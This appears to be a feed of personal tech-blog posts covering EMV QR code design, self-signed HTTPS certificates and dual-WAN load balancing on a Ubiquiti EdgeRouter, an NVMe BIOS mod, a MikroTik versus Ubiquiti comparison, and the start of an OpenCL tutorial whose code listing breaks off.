A lot of governments’ authorities created their QR code standards based on EMV QR code. For instance, SGQR from Singapore, BR Code from Brazil etc.
Even though EMV QR code is ubiqus, yet I don’t think it’s designed well from the beginning. Actually, to me, the EMV QR code looks very likely to be designed by someone with very little engineering excellence knowledge.
As a QR code, it denotes a string and it is encoded by a string value. The length of the string value usually decides how complex the QR code is. Most of the times, the longer the string value, the bigger QR will be. What does it imply for a bigger QR code? It means users need a better smart phone with a better camera to read the QR code, also the decoding process will be slightly longer. Well, it may mean nothing for you, there are actually so many users are using low-end or middle-range smart phones with less powerful cameras. What I mean here is making a QR code shorter and smaller does matter.
Let’s look at how EMV code standard does. Basically it follows a TLV ([Type–length–value](https://en.wikipedia.org/wiki/Type%E2%80%93length%E2%80%93value#:~:text=Within%20communication%20protocols%2C%20TLV%20(type,and%20finally%20the%20value%20itself.) format. TLV provides an excellent extensibility. Users can define a new Type and declare the length for the value then append a value, bingo. But is that the best you can do? Can you do better to make the value shorter while maintaining the extensibility. For example, can we combine the Type and Length, or even for certain type, we pre-defined the length? Of course, this will the standard more complex, but for the effeciency, it is well worth we invest more on the standard. The end-users, the consumers and the merchants won’t be bothered by the complexisity of the encoding or decoding of the QR code, as they never do it today. It’s the developers with sophisticated engineering knowledge who will do the encoding and decoding, so a little bit complexisity will for sure bring a much more effeciency QR code.
The Type part of the TLV simply use a 2 digit string value, from “00” to “99”. Sigh, even one byte can denote 2^8 = 256 values, you use 2 bytes?!!
Ok, let talk about the Value part of TLV. Even the Value part itself, EMV does a terrable job on efficiency. Look at how it denotes transaction currency: A 3-digit numeric value, as defined by [ISO 4217]. It simply uses 3 bytes for that where even two byte is a waste for a number less than 1000. One byte can denote 2^8 = 256, while 10 bits can denote 2^10 = 1024. So 10 bits is more than enough. To design a effecient QR stard, we’d better to count in bit instead of bytes! Someone may argue about readability. Please note, a value of the QR code is not designed for human to read it directly. Even with the existing EMV QR standard, one still need a decoder to view the vaules of each fields, so readability is non-sense.
How about transaction amount? From the standard, The transaction amount (excluding tips and convenience fees), if known. For instance, “99.34”. Let’s use the example from the standard, 99.34. It’s 5 bytes! Come one, one simple solution is to use the minor unit standard from ISO 4217, we can simply put 9934 without a dot. Minor unit standard is widely used and it can denote amount in integer without any concerns about float values (float can not be described precisely in computer). Check the APIs from Stripe, or other well designed APIs, all use the minor unit to denote the amount of money. Only non-professionals like PayPal will use a string of decimal to denote money. Ok, let’s say we use an int32 to denote money, only 4 bytes, we can denote from -2,147,483,648 to +2,147,483,647. But what if we want to add an amount of 21474836.47 by EMV QR standard? It’s 11 bytes.
In summary, TLV: not effecient. T: not effecient. L: not effecient. V: not effecient. I don’t think EMV code is designed with data effeciency in mind.
As mentioned earlier, the amount of money is not following the minor unit standard from ISO 4217. Even the CRC check is not following the standard. If you follow the wikipedia algorithm to implement the CRC, you will find the result doesn’t match… Ok, later, they revised the standard to mention they are using the polynomial ‘1021’ (hex) and initial value ‘FFFF’ (hex). The first version, they even not mention those 2 parameters, let the developers to try and guess. Can you imagine that? LOL.
In the EMV QR code standard, it mentions a field called Globally Unique Identifier, but there is not a strict format for it. According to the comment, An identifier that sets the context of the data that follows. The value is one of the following:
Well, if the format can be any one of the above format, and it’s possible to be in other format as well, then how do we make sure it’s globally unique? To design a standard, it’s better to think thorougly. Is it going to be used in a centralised way or decentralised way? Is the global uniqueness guaranteed by each country’s authorities, the QR generator (merchants for instance), the merchant acquirers, the payment gateway? Is it possible to define it in a more strict way and also make it as short as possible while gurantee the uniqueness? I don’t see a responsibility here when designing a standard.
If a standard was designed so bad, why a lot of countries’ authorities chose to use it? I don’t have an answer yet. These days, less and less people would like to think by themselves rather than following others. Please do think, and it’s a privilge as a human being.
]]>I’m not going to use a public domain name, neither will I issue a certificate through a public issuer, for example, letencrypt, which I’ve been vasively used for my public websites. The reason is for me, I don’t want my router to be exposed to the public internet, and the less exposion, the better. Setting up a letsencrypt certificate, most probably I need verify I own this domain name and the server, which means I will reveal my public IP address for my router, and that is not my intension.
With that, I’m going to generate a self signed certificate with a generated CA on a domain name I generated dedicated for my router (router.local). Then I will import my CA to my devices that need to access the router. Finally I’ll redirect my router’s local IP address to a local domain name (router.local).
Now I’m gonig to show you how to archive all the above step by step.
Here is the script. Copy and paste it into a file and run it on a Mac/Linux environment.
#!/bin/ksh
function CreateCertificateAuthority {
if [ -f ./ubntCA.key ]; then rm ./ubntCA.key; fi
if [ -f ./ubntCA.pem ]; then rm ./ubntCA.pem; fi
#
# Create the Root Key
#
openssl genrsa -out ubntCA.key 4096
#
# Now self-sign this certificate using the root key.
#
# CN: CommonName
# OU: OrganizationalUnit
# O: Organization
# L: Locality
# S: StateOrProvinceName
# C: CountryName
#
openssl req -x509 \
-new \
-nodes \
-key ubntCA.key \
-sha256 \
-days 36500 \
-subj "/C=US/ST=IS/L=TOTALLY/O=CONFUSED/OU=HERE/CN=LIANGSUN.ORG" \
-out ubntCA.pem
print ""
print "Now install this cert (ubntCA.pem) in your workstations Trusted Root Authority."
print ""
}
function CreateServerCertificate {
if [ -f ./server.key ]; then rm ./server.key; fi
if [ -f ./server.csr ]; then rm ./server.csr; fi
if [ -f ./server.crt ]; then rm ./server.crt; fi
#
# Create A Certificate
#
openssl genrsa -out server.key 4096
#
# Now generate the certificate signing request.
#
openssl req -new \
-key server.key \
-subj "/C=US/ST=IS/L=ALSOTOTALLY/O=CONFUSED/OU=HERE/CN=ROUTER.LOCAL" \
-out server.csr
#
# Now generate the final certificate from the signing request.
#
openssl x509 -req \
-in server.csr \
-CA ubntCA.pem \
-CAkey ubntCA.key \
-CAcreateserial \
-extfile <(printf "subjectAltName=DNS:ROUTER.LOCAL,IP:172.10.0.1,IP:172.20.0.1,IP:172.30.0.1,IP:192.168.0.1,IP:192.168.1.1") \
-out server.crt -days 36500 -sha256
}
function CreateServerPem {
cat server.crt > server.pem
cat server.key >> server.pem
}
CreateCertificateAuthority
CreateServerCertificate
CreateServerPem
This script will generate several files, and among them, there are 2 files are import to us, ubntCA.pem
and server.pem
. The file ubntCA.pem
is the one we need to import into our devices that need to access the router.
As an exapmle, to import the CA to a Windows system, run this command on a Command line with Administrator access.
certutil -addstore -enterprise -f "Root" ubntCA.pem
From the last step, we have generated a file called server.pem
. This is the file we need to install onto the router.
We can use scp
command to copy this file to the router, like this:
scp server.pem USER@172.10.0.1:~/
Here, USER is the username, and 172.10.0.1 is the IP address of the router.
Open a ssh connection to the router, and copy the the file to the lighttpd server configuration folder.
cd /etc/lighttpd
sudo mv server.pem server.pem.bk
sudo cp /home/USER/server.pem ./
Then restart the lighttpd server:
sudo killall lighttpd
sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Of course we can modify each client’s hosts file to redirect the domain router.local into the IP of the router, in this case, it’s 172.10.0.1, but I want to do this in a smarter way, so that each client doesn’t need to manually modify the hosts file. I’m going to modify the router itself.
Again ssh into the router and run configure
command to goin the configuration shell.
Then run the following command:
set system static-host-mapping host-name router.local inet 172.10.0.1
commit
save
Probably there is a way to configure this on the Web UI also, but since CLI can handle this faster, I don’t want to find a way on the UI.
Now we can access the router on a client side without the certificate error. Just open https://router.local on a client that has imported the CA.
Last question is, what if a user open https://172.10.0.1 which is the IP address of the router? They will still get a SSL certificate error.
To resolve the last problem and make this solution perfect, follow the next step.
Again ssh into the router and go to the folder /etc/lighttpd/conf-enabled
and create a new file called 11-redirect.conf
with the following content.
$HTTP["scheme"] == "https" {
$HTTP["host"] =~ "^\d+\.\d+\.\d+\.\d+$" {
url.redirect = (
"^(.*)$" => "https://router.local$1"
)
}
}
Then edit the file /etc/lighttpd/lighttpd.conf
to include the above config file.
include "conf-enabled/10-ssl.conf"
include "conf-enabled/11-redirect"
include "conf-enabled/15-fastcgi-python.conf"
Add the second line, the same way as the existing 10-ssl.conf
and 15-fastcgi-python.conf
files.
Now restart the lighttpd server again.
sudo killall lighttpd
sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Now, https://172.10.0.1 will be redirectd to https://router.local without a certificate warning.
So far, everything works. But one day you reboot your router and find the server certificate is regenerated. To resolve this issue, we need to save the configuration in a permanent way.
Login to the router by ssh and copy the server.pem
file into folder /config/auth/
and run the following command
configure
set service gui cert-file /config/auth/server.pem
commit
save
Run this command to show everything is good:
ubnt# show service gui
It will show the following:
cert-file /config/auth/server.pem
http-port 80
https-port 443
listen-address 172.20.0.1
older-ciphers disable
By the way, you should always set the listen-address
to a local IP address for both services gui
and ssh
. This will prevent the router from accessing from the public internet, which I see no point Ubiquiti not setting it as a default.
Conguratulations, you find a perfect solution!
]]>I kept telling myself not to modify/re-program BIOS/UEFI for a long time. Why? I thought the stability of a motherboard is super important. If I did, could it break it? Besides, if the power gets shut down while flashing a new version of BIOS, I could permanently lose a motherboard. Do I have to buy a UPS before that? I’m not that rich to buy UPS without considering the cost. If you would like to sponsor one, please let me know.
These days, I’m playing some Supermicro motherboards. One of the most important reasons I like Supermicro is IPMI/BMC. With IPMI, I don’t need to physically connect my monitor to the machine anymore. I can do anything, install a new operating system for the computer, change BIOS settings, or even upgrade the BIOS version remotely.
IPMI gives me confidence that I can play with BIOS now. Even if I flash with a corrupt BIOS file, then I can flash it back. So there is nothing to worry about.
Now the only thing left is maybe a fuse, and now it comes today. I bought a X9SCA-F for building my home NAS, a 10Gigabit NAS.
Motherboard: X9SCA-F
CPU: Xeon E3 1220 V2
RAM: 2x 8GB unbuffered ECC DIMM
SSD: 2x Samsung 970 Evo Plus NVME M.2 1TB
Network card: Mellanox dual 10Gb ConnectX-3
Looks good, right? The only problem is X9SCA-F doesn’t support NVME M.2 because it’s quite an old product from 2013, and now it’s 2020, 7 years passed.
After doing some research, I find it’s possible to MOD the motherboard BIOS to support NVME!
What I did is just following this post: https://www.win-raid.com/t871f50-Guide-How-to-get-full-NVMe-support-for-all-Systems-with-an-AMI-UEFI-BIOS.html and it’s quite straight forward. With a tool called UEFITool (from CodeRush), I Mod a BIOS in about 15 minutes. Of course, I need to install Windows in VirtualBox beforehand.
Now I have an X9SCA-F motherboard with NVME support. Isn’t that amazing?
Update: It turns out the X9SCA-F motherboard has a limit of 5Gbps bandwidth for its PCIE ports, so it’s not possible to reach my goal of home NAS, ie 10Gb or even 20Gb. With that, I decide to upgrade my motherboard with a X10SLM+-F/X10SLL+-F or X10SRi-F/X10SRL-F/X10SRH-CF/X10SRH-CLN4F.
]]>Now today, I want to talk about equipment across the 2 markets, MikroTik and Ubiquiti. They have enterprise quality without real-time tech support, which is perfect for technical people who have a pursuit of quality and speed.
So what would you consider for choosing a router or switch? I don’t know you, but I would consider (from most important to least important): Security > Reliability > Noise Level > Performance (Throughput) > Hardware Interface > Scalability > User Experience > Power Source > Power Cost > Technical Support > Rack Mount
Security is more about routers than switches because routers are the ones that communicate with the internet directly while switches most times only reside inside an intranet.
Security Vulnerabilities Published In 2018 for MikroTik RouterOS: https://www.cvedetails.com/vulnerability-list/vendor_id-12508/product_id-23641/year-2018/Mikrotik-Routeros.html
Security Vulnerabilities Published In 2018 for Ubiquiti EdgeOS: https://www.cvedetails.com/vulnerability-list/vendor_id-12765/product_id-44469/year-2018/Ubnt-Edgeos.html
Comparing these two, Ubiquiti is slightly better than MikroTik. There was one CVE from MikroTik CVE-2018-7445 (Exec Code Overflow) that scored as 10 (the highest vulnerability score) The detail of this CVE:
A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so an unauthenticated, remote attacker can exploit it. All architectures and all devices running RouterOS before versions
6.41.3
/6.42rc27
are vulnerable.
I hope no one is using an internet-facing router to serve SMB service, because it’s too risky to do that. A simple nmap exposes itself as an SMB server, and it’s not that difficult to exploit a file sharing service like SMB. In other words, we should always put a file sharing service on a switch. But unfortunately, for MikroTik switches, there isn’t one switch that supports NVME m.2 interface like their high-end routers, so this feature seems useless for high-speed local storage service. Even there exists, their SMB service only supports Samba 1.0, and only Samba 3.0 or above has the feature to aggregate bandwidth from different links. So I would suggest MikroTik focus on what a router is supposed to do and let end users build their own professional high-speed local NAS. Ubiquiti doesn’t have this feature at all; neither do they support an NVME storage in their router. Thus no such issues for Ubiquiti.
For switches, the security is less critical because we usually access them from inside a network. Still a minus point to SwOS
because it doesn’t support to modify the default admin user name. I know most new MikroTik switches (CRS
Cloud Router Switch series) support both SwOS
and RouterOS
, and RouterOS
doesn’t have this issue, but still, someone would prefer the old and more cost-effective CSS
(Cloud Smart Switch) series. Ubiquiti’s UI does support this but not so apparent to end-users. We need to switch to the legacy UI to do so rather than the default new UI or use the CLI.
From my personal experience, MikroTik is slightly better than Ubiquiti on this. It might because I purchased an Edge Switch 2 years ago, and before the new v1.8.3
release, I was hit several times by this issue:
https://community.ui.com/questions/Losing-access-to-switches-Regulary-Regreting-buying-Ubiquiti/5202e750-f497-40d0-a00d-908c8c2a3d0a
With the v1.8.3
release, they have added some methods to mitigate this issue but have not yet 100% resolved it after 2 years. It seems the root cause is still not found.
MikroTik’s SwOS v2.5 in 2017 was infamous on the CxS326 platform, as there were issues with the 10GbE port performance. The fix was simple, downgrading to v2.4
. These issues have been fixed.
Ubiquiti’s EdgeRouter ER-X also had some reliability issues with their firmware in v2.x
. I downgraded to v1.x
, and so far, it’s OK for half a year. Now if you check their firmware downloading page, you find 2 versions (as of writing on 29 May 2020):
I assume the v2
is still not stable because there is a hotfix suffix in that build name, which means there was a critical bug before that build.
Right now, I stick with v1.10.11
for ER-X and not go for v2
for a long time and v1.8.5
for EdgeSwitch and not go for v1.9
for a long time.
Users also complain about the version naming for Ubiquiti’s firmware. Instinctually people would think v2
is better than v1
, but that’s not the case for Ubiquiti. v2
is experimental, while v1
is the stable version for the case ER-X. This issue doesn’t happen for MikroTik, which separates their versions into 4 segments: long-term
, stable
, testing
, and development
. I always choose stable
or long-term
versions for RouterOS.
It all depends on where you put your equipment. If it’s for a home lab, for sure, you don’t want a MikroTik CRS354-48G-4S+2Q+RM because it’s too noisy unless you have a good rack cabinet and put it somewhere far from your living and working place.
Both Ubiquiti and MikroTik have quiet/fanless solutions. We only need to choose the right models. For POE switches, of course, we need fans, and if you are searching for solutions to modify the fans with some quiet ones, I don’t have any experience to share with you. Good luck!
MikroTik has a much higher performance than Ubiquiti for products in the same price segments. A few examples:
Ubiquiti ER-12 | measured with firmware v1.9.7 | ||||||
Mode | Configuration | 1518 byte | 512 byte | 64 byte | |||
kpps | Mbps | kpps | Mbps | kpps | Mbps | ||
Routing | none (fast path) | 650 | 8,000 | 3,400 | 1,800 |
Data source: https://www.ui.com/edgemax/comparison/
RB4011iGS+RM | AL21400 1G/S+ all port test | ||||||
Mode | Configuration | 1518 byte | 512 byte | 64 byte | |||
kpps | Mbps | kpps | Mbps | kpps | Mbps | ||
Bridging | none (fast path) | 806 | 9,792 | 2,312 | 9,473 | 5,509 | 2,821 |
Bridging | 25 bridge filter rules | 806 | 9,792 | 1,037 | 4,249 | 1,153 | 590 |
Routing | none (fast path) | 806 | 9,792 | 1923 | 7,877 | 5,092 | 2,607 |
Routing | 25 simple queues | 806 | 9,792 | 1,046 | 4,286 | 960 | 491 |
Routing | 25 ip filter rules | 593 | 7,209 | 625 | 2,560 | 564 | 289 |
Data source: https://mikrotik.com/product/rb4011igs_rm with corrections on some data.
I don’t understand why MikroTik made some basic mistakes on some ,
and .
notation in their test data, so I have to make some corrections to make them add up.
Please also note the throughput value in Mbps used above for Ubiquiti seems the real data excluding the packet overhead, while for MikroTik data, the packet overhead is included.
Even considering all those overhead and mistakes, MikroTik still has a higher performance.
ES-24-LITE has a throughput of 26Gbps and CRS326-24G-2S+RM has a throughput of 33Gbps+. That simple comparison may be not fair.
In terms of hardware interface, MikroTik is much more aggressive, and Ubiquiti looks conservative in general. You would see more SFP+ ports used in MikroTik products, while Ubiquiti only has SFP ports in the same price segmentations.
One example is the comparison between CRS326-24G-2S+RM and ES-24-LITE we just talked about above.
Another example is MikroTik CRS354-48G-4S+2Q+RM (suggested price $499) and Ubiquiti ES-48-LITE (suggested price $460). CRS354-48G-4S+2Q+RM has 48 Gigabit Ethernet ports, 4 10-Gigabit SFP+ ports, and 2 40-Gigabit QSFP ports. In comparison, ES-48-LITE only has 48 Gigabit Ethernet ports, 2 Gigabit SFP ports and 2 10-Gigabit SFP+ ports.
There is also one product I have found that Ubiquiti has an advantage over MikroTik. MikroTik CRS312-4C+8XG-RM (suggested price $599) and Ubiquiti US‑16‑XG ($599 but out of stock at the moment 30 May 2020). CRS312-4C+8XG-RM has 4 Combo 10-Gigabit Ethernet/SFP+ ports (for each of the Combo port, users can choose to use a 10-Gigabit Ethernet port, or a 10-Gigabit SFP+ port), and 8 10-Gigabit Ethernet ports. In comparison, US‑16‑XG has 12 10-Gigabit SFP+ ports and 4 10-Gigabit Ethernet ports.
MikroTik has very limited scalabilities, but Ubiquiti is doing quite well on this.
Ubiquiti develops a centralized management software called UNMS ( Ubiquiti Network Management System). It provides 2 options. Users can either host the UNMS by themselves or use the free UNMS provided by Ubiquiti if they have at least 10 Ubiquiti devices. With UNMS, we can manage thousands of UniFi devices across multiple sites, and scale network as needed without any ongoing licensing fees. For UniFi series devices, we can also use UniFi Controller, another centralized tool to manage devices.
When you have more than 10 devices, including routers, switches, and wireless APs, I would strongly suggest you use Ubiquiti products rather than MikroTik.
For example, you have 3 apartments, and each one installs one router, one switch, 2 wireless AP, then it could be a burden for you to manage those devices. You would want to upgrade the firmware by one click remotely. Or maybe you have one big detached house, and you need to install 10 wireless APs, then again, better to choose Ubiquiti. Of course, it may not be that often to upgrade firmware for network devices that we expect to run for a reasonably long time. Another benefit for a centralized management system is that when issues happen, we can quickly have a basic idea which part of the system goes wrong and most probably come up with a fast solution.
On the other hand, if you are sure that you won’t have many devices and scalability is not an issue to you, or you think everything is still manageable, then maybe MikroTik is not a bad choice.
Ubiquiti is slightly better than MikroTik in terms of user experience.
MikroTik provides a native desktop app called WinBox, but sadly it only supports Windows, and it won’t work on a Mac OS, especially for the newer versions even the Wine solution won’t work. WinBox is very useful when sometimes users make some stupid mistakes on IP addresses. It can connect to routers/switches without an IP address! How? It connects directly with MAC addresses. That’s a feature that Ubiquiti doesn’t provide. For Ubiquiti devices, in case we mess up with IP addresses, the only way is to reset to factory settings and start over again. Professional network engineers probably make IP mistakes very rarely, but as a non-professional engineer, I made such mistakes several times.
Both MikroTik and Ubiquiti provide Web and CLI (Command-Line Interface) management. MikroTik UI is more straight forward while Ubiquiti UI looks well designed by UI/UX designers and maybe also product managers instead of coming out from software engineers alone.
Again, the UNMS is more user friendly when managing more than 10 devices. UNMS is fantastic, and once you tried, maybe you would never want to go back to the old days. UNMS itself makes Ubiquiti’s user experience better than MikroTik.
Some MikroTik devices, for instance, RB400iGS+RM, have a way too bright LED for power status, which is complained by many users, but it seems MikroTik doesn’t bother to care about it at all. On the contrary, Ubiquiti devices look more decent.
MikroTik products tend to provide redundancies in power sources. As an example, CSS326-24G-2S+RM has a DC input and also a POE in. Technically, this makes this a dual power supply switch, and the PoE side can be latched and come from a higher-quality power source. Ubiquiti UnifiSwitch-24 only has one AC input, so does Ubiquiti EdgeSwitch 24.
As an extreme example, MikroTik CRS305-1G-4S+IN even has 2 DC inputs and also a POE in, which technically makes it a triple power supply switch.
Sometimes, the preference of the power method depends on whether we put the device into a rack. Usually, for a rack-mountable device, we prefer an AC power than a DC, because with a DC power, the adapter is quite big and it’s not that easy to find a place to plug it into a rack. However, for none-rack-mount devices, a DC power is more cost-effective.
UnifiSwitch-24 has one AC input, which is better than CSS326-24G-2S+RM, but the later has a POE in, which the former doesn’t have.
I can’t say which is better, but it depends on what you need and what you prefer.
We don’t need to consider power cost for a home lab because we are not running thousands of devices at the same time, and for devices running in less than 100W, we just don’t care.
Both MikroTik and Ubiquiti have limited technical support. Most of the time, we depend on their forums for answers, and that is the fun part, is it?
Ubiquiti’s most devices are rack-mountable, with an additional rack mount kit, which they sell it separately. MikroTik has rack-mount versions for their products, with an RM in the affix in the product name, for example, RB4011iGS+RM; and also, it has none-rack-mount versions, for example, CCR1009-7G-1C-PC.
]]>Ubiquiti has a very user-friendly forum for beginners to learn almost all technologies for EdgeRouter X. However, for the second issue (if you think it’s an issue), I don’t find anything on the internet. Probably it’s not that popular in China? Anyway, here is the story.
Dual WAN, both are connecting through PPPoE. eth0 connects pppoe0 (WAN0), and eth1 connects pppoe1 (WAN1).
The first configuration is an easy one, the DNS name server. For dual WAN, we should use a name server at the system level instead of using the one automatically retrieved from ISP. Commands:
set interfaces ethernet eth0 pppoe 0 name-server none
set system name-server 114.114.114.114
(Reference: https://community.ui.com/questions/PPPoE-and-DNS-issues/c6ea0bb1-9a29-45c4-9aa5-eff94ef9f65b)
The second issue is not so obvious, and I find this issue by reading the message logs in /var/log/messages
, sometimes, the load balance became inactive and then after a while became active again, and this happened once a while repeatly.
$ tail /var/log/messages
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 reachability changes to unreachable.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 state changes to inactive.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 reachability changes to unreachable.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 state changes to inactive.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 reachability changes to reachable.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 state changes to active.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 reachability changes to reachable.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 state changes to active.
By checking connections, I see some strange connection to 8.8.8.8, which I never set as a DNS server in anyplace.
sudo conntrack -L
icmp 1 13 src=**** dst=8.8.8.8 type=8 code=0 id=26922 src=8.8.8.8 dst=**** type=0 code=0 id=26922 mark=1694498816 use=1
udp 17 177 src=**** dst=8.8.8.8 sport=26528 dport=53 src=8.8.8.8 dst=**** sport=53 dport=26528 [ASSURED] mark=1686110208 use=1
After a thorough read about https://help.ubnt.com/hc/en-us/articles/205145990-EdgeMAX-Dual-WAN-Load-Balance-Feature, I get to know that the default behavior for a load balancer is to send a ping to 8.8.8.8 every minute if it fails, then set the reachability to unreachable for that network and redirect all traffic to the other network. With that knowledge, it’s an easy fix then.
set load-balance group G interface pppoe0 route-test type ping target 114.114.114.114
set load-balance group G interface pppoe1 route-test type ping target 114.114.114.114
Also, we can tune the failure count and interval parameters to make this even more robust and reliable. Then final settings for each interface:
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
I hope you enjoyed reading this article, and in case you faced the same issue, and you feel this article helpful, please comment below and let me know.
Here is the full configuration:
firewall {
all-ping enable
broadcast-ping enable
group {
network-group PRIVATE_NETS {
network 192.168.0.0/16
network 172.16.0.0/12
network 10.0.0.0/8
}
}
ipv6-receive-redirects disable
ipv6-src-route disable
ip-src-route disable
log-martians disable
modify balance {
rule 60 {
action modify
modify {
table 11
}
source {
address 192.168.1.13-192.168.1.16
}
}
rule 70 {
action modify
modify {
table 12
}
source {
address 192.168.1.11-192.168.1.12
}
}
rule 80 {
action modify
modify {
lb-group G
}
}
}
options {
mss-clamp {
mss 1452
}
}
receive-redirects disable
send-redirects enable
source-validation disable
syn-cookies enable
}
interfaces {
ethernet eth0 {
description "WAN 0"
duplex auto
pppoe 0 {
default-route none
description "China Telecommunication"
mtu 1492
name-server none
password ****
user-id ****
}
speed auto
}
ethernet eth1 {
description "WAN 1"
duplex auto
pppoe 1 {
default-route none
description "China Unicom"
mtu 1492
name-server none
password ****
user-id ****
}
speed auto
}
ethernet eth2 {
duplex auto
speed auto
}
ethernet eth3 {
duplex auto
speed auto
}
ethernet eth4 {
duplex auto
speed auto
}
loopback lo {
}
switch switch0 {
address 192.168.1.1/24
description Local
firewall {
in {
modify balance
}
}
mtu 1492
switch-port {
interface eth2 {
}
interface eth3 {
}
interface eth4 {
}
vlan-aware disable
}
}
}
load-balance {
group G {
exclude-local-dns disable
flush-on-active enable
gateway-update-interval 20
interface pppoe0 {
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
weight 70
}
interface pppoe1 {
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
weight 30
}
lb-local enable
lb-local-metric-change disable
sticky {
source-addr enable
}
}
}
port-forward {
auto-firewall disable
hairpin-nat disable
wan-interface pppoe0
}
protocols {
static {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe0 {
}
next-hop-interface pppoe1 {
}
}
table 11 {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe0 {
}
}
}
table 12 {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe1 {
}
}
}
}
}
service {
dhcp-server {
disabled false
hostfile-update disable
shared-network-name LAN {
authoritative enable
subnet 192.168.1.0/24 {
default-router 192.168.1.1
dns-server 192.168.1.1
lease 86400
start 192.168.1.38 {
stop 192.168.1.243
}
static-mapping 12 {
ip-address 192.168.1.12
mac-address ****
}
static-mapping 11 {
ip-address 192.168.1.11
mac-address ****
}
static-mapping EdgeSwitch {
ip-address 192.168.1.2
mac-address ****
}
static-mapping 13 {
ip-address 192.168.1.13
mac-address ****
}
static-mapping 14 {
ip-address 192.168.1.14
mac-address ****
}
static-mapping 15 {
ip-address 192.168.1.15
mac-address ****
}
static-mapping 16 {
ip-address 192.168.1.16
mac-address ****
}
}
}
static-arp disable
use-dnsmasq disable
}
dns {
forwarding {
cache-size 2000
listen-on switch0
}
}
gui {
http-port 80
https-port 443
older-ciphers disable
}
nat {
rule 1 {
description 11
destination {
port 47900-47910
}
inbound-interface pppoe1
inside-address {
address 192.168.1.11
port 47900-47910
}
log disable
protocol tcp_udp
type destination
}
rule 2 {
description 12
destination {
port 47800-47810
}
inbound-interface pppoe1
inside-address {
address 192.168.1.12
port 47800-47810
}
log disable
protocol tcp_udp
type destination
}
rule 3 {
description 13
destination {
port 47300-47310
}
inbound-interface pppoe0
inside-address {
address 192.168.1.13
port 47300-47310
}
log disable
protocol tcp_udp
type destination
}
rule 4 {
description 14
destination {
port 47400-47410
}
inbound-interface pppoe0
inside-address {
address 192.168.1.14
port 47400-47410
}
log disable
protocol tcp_udp
type destination
}
rule 5 {
description 15
destination {
port 47500-47510
}
inbound-interface pppoe0
inside-address {
address 192.168.1.15
port 47500-47510
}
log disable
protocol tcp_udp
type destination
}
rule 6 {
description 16
destination {
port 47600-47610
}
inbound-interface pppoe0
inside-address {
address 192.168.1.16
port 47600-47610
}
log disable
protocol tcp_udp
type destination
}
rule 7 {
description 11
destination {
port 47900-47910
}
inbound-interface pppoe0
inside-address {
address 192.168.1.11
port 47900-47910
}
log disable
protocol tcp_udp
type destination
}
rule 8 {
description 12
destination {
port 47800-47810
}
inbound-interface pppoe0
inside-address {
address 192.168.1.12
port 47800-47810
}
log disable
protocol tcp_udp
type destination
}
rule 9 {
description 13
destination {
port 47300-47310
}
inbound-interface pppoe1
inside-address {
address 192.168.1.13
port 47300-47310
}
log disable
protocol tcp_udp
type destination
}
rule 10 {
description 14
destination {
port 47400-47410
}
inbound-interface pppoe1
inside-address {
address 192.168.1.14
port 47400-47410
}
log disable
protocol tcp_udp
type destination
}
rule 11 {
description 15
destination {
port 47500-47510
}
inbound-interface pppoe1
inside-address {
address 192.168.1.15
port 47500-47510
}
log disable
protocol tcp_udp
type destination
}
rule 12 {
description 16
destination {
port 47600-47610
}
inbound-interface pppoe1
inside-address {
address 192.168.1.16
port 47600-47610
}
log disable
protocol tcp_udp
type destination
}
rule 5000 {
description "masquerade for WAN 0"
log disable
outbound-interface pppoe0
protocol all
source {
}
type masquerade
}
rule 5002 {
description "masquerade for WAN 1"
log disable
outbound-interface pppoe1
protocol all
source {
}
type masquerade
}
}
ssh {
port 22
protocol-version v2
}
ubnt-discover {
disable
}
unms {
disable
}
}
system {
conntrack {
expect-table-size 4096
hash-size 4096
modules {
sip {
disable
}
}
table-size 32768
tcp {
half-open-connections 512
loose enable
max-retrans 3
}
}
host-name ubnt
ipv6 {
disable
}
login {
user ubnt {
authentication {
encrypted-password ****
plaintext-password ""
}
level admin
}
}
name-server 114.114.114.114
name-server 114.114.115.115
name-server 119.29.29.29
name-server 223.5.5.5
offload {
hwnat enable
}
syslog {
global {
facility all {
level notice
}
facility protocols {
level debug
}
}
}
time-zone Asia/Singapore
}
/* Warning: Do not remove the following line. */
/* === vyatta-config-version: "config-management@1:conntrack@1:cron@1:dhcp-relay@1:dhcp-server@4:firewall@5:ipsec@5:nat@3:qos@1:quagga@2:suspend@1:system@4:ubnt-pptp@1:ubnt-udapi-server@1:ubnt-unms@1:ubnt-util@1:vrrp@1:vyatta-netflow@1:webgui@1:webproxy@1:zone-policy@1" === */
/* Release version: v2.0.8.5247496.191120.1124 */
The kernel is written in the OpenCL language which is a subset of C and has a lot of math and vector functions included. The kernel to perform the vector addition operation is defined below.
1
2
3
4
5
6
7
8
__kernel void vector_add(__global const int *A, __global const int *B, __global int *C) {
// Get the index of the current element to be processed
int i = get_global_id(0);
// Do the operation
C[i] = A[i] + B[i];
}
The host program controls the execution of kernels on the computing devices. The host program is written in C, but bindings for other languages like C++ and Python exists. The OpenCL API is defined in the cl.h (or opencl.h for apple) header file. Below is the code for the host program that executes the kernel above on computing device. I will not go into details on each step as this is supposed to be an introductory article.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
